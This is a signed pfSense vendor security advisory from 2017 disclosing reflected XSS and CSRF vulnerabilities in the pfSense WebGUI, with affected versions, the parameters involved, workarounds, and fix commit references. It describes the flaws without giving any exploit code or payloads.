-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

=============================================================================
pfSense-SA-17_03.webgui                                     Security Advisory
                                                                      pfSense

Topic:          Multiple XSS and CSRF Vulnerabilities in the WebGUI

Category:       pfSense Base System
Module:         webgui
Announced:      2017-02-10
Credits:        Tim Coen - Curesec GmbH
Affects:        pfSense software version <= 2.3.2_1
Corrected:      2017-02-07 18:35:24 UTC (pfSense/master, pfSense 2.4)
                2017-02-07 18:37:03 UTC (pfSense/RELENG_2_3, pfSense 2.3.x)
                2017-02-07 18:37:07 UTC (pfSense/RELENG_2_3_2, pfSense 2.3.2_x)

0.   Revision History

v1.0  2017-02-10 Initial release

I.   Background

pfSense® software is a free network firewall distribution based on the
FreeBSD operating system.  The pfSense software distribution includes third-
party free software packages for additional functionality, and provides most of
the functionality of common commercial firewalls.

The majority of users of pfSense software have never installed or used a stock
FreeBSD system.  Unlike similar GNU/Linux-based firewall distributions, there
is no need for any UNIX knowledge.  The command line is never used, and there
is no need to ever manually edit any rule sets. Instead, pfSense software
includes a web interface for the configuration of all included components.
Users familiar with commercial firewalls will quickly understand the web
interface, while those unfamiliar with commercial-grade firewalls may encounter
a short learning curve.

II.  Problem Description

Multiple Cross-Site Scripting (XSS) vulnerabilities and one CSRF issue were
found in the pfSense software WebGUI on version 2.3.2_1 and earlier.

On pkg_mgr_install.php, the "from" and "to" parameter are vulnerable to
reflected XSS when performing a reinstall action.

On pkg.php, the "pkg_filter" parameter is vulnerable to reflected XSS when a
package XML file contains a field type of "sorting" which also has
"include_filtering_inputbox" active. Currently the only affected package is
FreeRADIUS ( freeradius.xml and freeradiusauthorizedmacs.xml both meet these
conditions ).

The easyrule.php script uses GET variables to, making it possible to add new
firewall rules via CSRF.

III. Impact

Due to the lack of proper encoding on the affected variables and pages
succeptible to XSS, arbitrary JavaScript can be executed in the user's browser.
The user's session cookie or other information from the session may be
compromised.

Due to the use of GET on easyrule.php, a firewall administrator could
unknowingly create an unwanted firewall rule if they are the victim of a CSRF
attack.

IV.  Workaround

To mitigate the problem on older releases, use one or more of the following:
* Limit access to the affected pages to trusted administrators only.
* Do not log into the firewall with the same browser used for non-
  administrative web browsing.

V.   Solution

Upgrade to version 2.3.3 of the pfSense software, or a later version. This may
be performed in the web interface or from the console.

   See https://doc.pfsense.org/index.php/Upgrade_Guide

VI.  Correction details

The following list contains the correction revision numbers for each
affected item.

Branch/path                                                      Revision
- - -------------------------------------------------------------------------
pfSense/master                     2c06742d784cb7ec85151327fd753536d98fbcc1
                                   ed7bfaa4b99fc6d4c4f3b2be1dfd738f3cc8e16b
                                   0f026089f65d92328d680443de5f9a90af50115c
pfSense/RELENG_2_3                 082f3663d2ac75e1f7e718715ea23b0168a866a7
                                   7100f0410b02d152f12f95fa892c427b06ec26c0
                                   4cef56bf20314009ad83bf747901ed1adeda8c70
pfSense/RELENG_2_3_2               ede8a9537ef9d15f8c1d288d9e89d4476a84656f
                                   ed7bfaa4b99fc6d4c4f3b2be1dfd738f3cc8e16b
                                   f0cf40f964f2a559ddcf495f492bd9d38f924512
- - -------------------------------------------------------------------------

VII. References

<URL:https://doc.pfsense.org/index.php/Upgrade_Guide>

The latest revision of this advisory is available at
<URL:https://pfsense.org/security/advisories/pfSense-SA-17_03.webgui.asc>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2

iQIcBAEBCAAGBQJYneCxAAoJEBO5h/2SFPjaDegQAMFyO8tC2fUGpFUU1Rqtb0F0
HYiC1aCGbRbhUeLXyKTYm2Nyy4CUlnhErVPrcSSjf5/s8vQSS5TpLWIcmWgJkiNg
CMcflabTcbq/rQCAQv6bPVa/EjV1sXa2OFVYjl2cuJmkP+yoTpKE4DbbNVZHvgsA
gfFzXNLM0LYIROLRp15dgJGKZk6QUG+Xb0n9ssP8dj95m/OVZ8P1ChXlXb6ysEEl
aZdKLVEIOtb04aZW0+3KMGzmxziIsVsU3lDRyBpbi/EOl5uJZR9q3YTCcxgIP6Hh
ZCZJ4mIBeuWMt7SV1J6xKBV//p9UoG4FTF2eSn5TBQoFpNhkvNElTmmO9LfAYpCz
bIUBB8pGCT199TvFN08TZPyMXQfZDQ3fq6W1MYSfzMYBXauVuELG+4jROV2RkJB2
28NcpY0CmoTM3QjJQY5krgA4iI9WoIz/EZ85mecvvJ4SOXSlyJaDWGvGFNl4kFEG
TDBmZ6/yMI3sQCiJ4Ngc4Sig+B9h9K9h/cAuZluT6NYsV454G7lcQfQwT/0J2U34
+sAqcZL+zcRlK5x2CSCWJMCogj30K8LXJscAqS5T6ja1vJ9MKewpmIZtGJbiGa8N
jadQ/bKiRxBBOBgj/m//+JbUUK01rWy1brc6txPNt8/SnkVB9NjPO5h03OOpchPx
v9u2MIQcICFxGMB5k5AZ
=pUrT
-----END PGP SIGNATURE-----